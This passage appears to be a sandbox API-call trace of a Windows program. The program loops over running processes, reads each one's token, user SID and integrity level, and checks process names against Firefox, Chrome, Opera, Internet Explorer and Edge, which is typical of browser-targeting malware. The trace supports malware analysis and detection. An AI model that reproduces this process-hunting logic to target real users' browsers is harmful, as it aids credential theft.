OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0512.722] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0512.722] GetLastError () returned 0x7a [0512.722] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0512.722] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0512.722] CloseHandle (hObject=0x3bc) returned 1 [0512.722] CloseHandle (hObject=0x5a4) returned 1 [0512.722] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0512.722] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0512.722] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0512.722] GetLastError () returned 0x7a [0512.722] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0512.723] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0512.723] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0512.723] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0512.723] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0512.723] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0512.723] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0512.723] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0512.723] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0512.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0512.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0512.723] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0512.723] GetLastError () returned 0x7a [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0512.723] CloseHandle (hObject=0x3bc) returned 1 [0512.723] CloseHandle (hObject=0x5a4) returned 1 [0512.723] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0512.723] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0512.723] GetLastError () returned 0x7a [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0512.723] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0512.723] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0512.723] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0512.723] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0512.723] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0512.723] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0512.723] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0512.723] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0512.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0512.723] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0512.723] GetLastError () returned 0x7a [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0512.723] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0512.723] CloseHandle (hObject=0x3bc) returned 1 [0512.723] CloseHandle (hObject=0x5a4) returned 1 [0512.724] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0512.724] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0512.724] GetLastError () returned 0x7a [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0512.724] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0512.724] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0512.724] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0512.724] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0512.724] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0512.724] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0512.724] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0512.724] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0512.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0512.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0512.724] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0512.724] GetLastError () returned 0x7a [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0512.724] CloseHandle (hObject=0x3bc) returned 1 [0512.724] CloseHandle (hObject=0x5a4) returned 1 [0512.724] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0512.724] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0512.724] GetLastError () returned 0x7a [0512.724] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0512.724] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0512.724] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0512.724] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0512.724] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0512.724] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0512.724] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0512.724] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0512.724] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0512.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0512.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0512.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0512.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0512.725] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0512.725] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0512.725] GetLastError () returned 0x7a [0512.725] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0512.725] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0512.725] CloseHandle (hObject=0x3bc) returned 1 [0512.725] CloseHandle (hObject=0x5a4) returned 1 [0512.725] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0512.725] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0512.725] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0512.725] GetLastError () returned 0x7a [0512.725] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0512.725] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0512.725] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0512.725] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0512.725] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0512.725] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0512.725] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0512.725] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0512.725] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0512.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0512.725] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0512.725] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0514.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1f8) returned 0xc0000004 [0514.729] VirtualAlloc (lpAddress=0x0, dwSize=0xb1f8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0514.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1f8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0514.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0514.730] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0514.730] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0514.730] GetLastError () returned 0x7a [0514.730] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0514.731] CloseHandle (hObject=0x3bc) returned 1 [0514.731] CloseHandle (hObject=0x5a4) returned 1 [0514.731] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0514.731] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0514.731] GetLastError () returned 0x7a [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0514.731] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0514.731] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0514.731] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0514.731] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0514.731] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0514.731] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0514.731] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0514.731] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0514.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0514.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0514.731] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0514.731] GetLastError () returned 0x7a [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0514.731] CloseHandle (hObject=0x3bc) returned 1 [0514.731] CloseHandle (hObject=0x5a4) returned 1 [0514.731] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0514.731] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0514.731] GetLastError () returned 0x7a [0514.731] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0514.731] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0514.731] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0514.731] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0514.731] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0514.731] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0514.732] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0514.732] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0514.732] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0514.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0514.732] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0514.732] GetLastError () returned 0x7a [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0514.732] CloseHandle (hObject=0x3bc) returned 1 [0514.732] CloseHandle (hObject=0x5a4) returned 1 [0514.732] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0514.732] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0514.732] GetLastError () returned 0x7a [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0514.732] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0514.732] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0514.732] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0514.732] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0514.732] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0514.732] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0514.732] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0514.732] lstrcmpiW 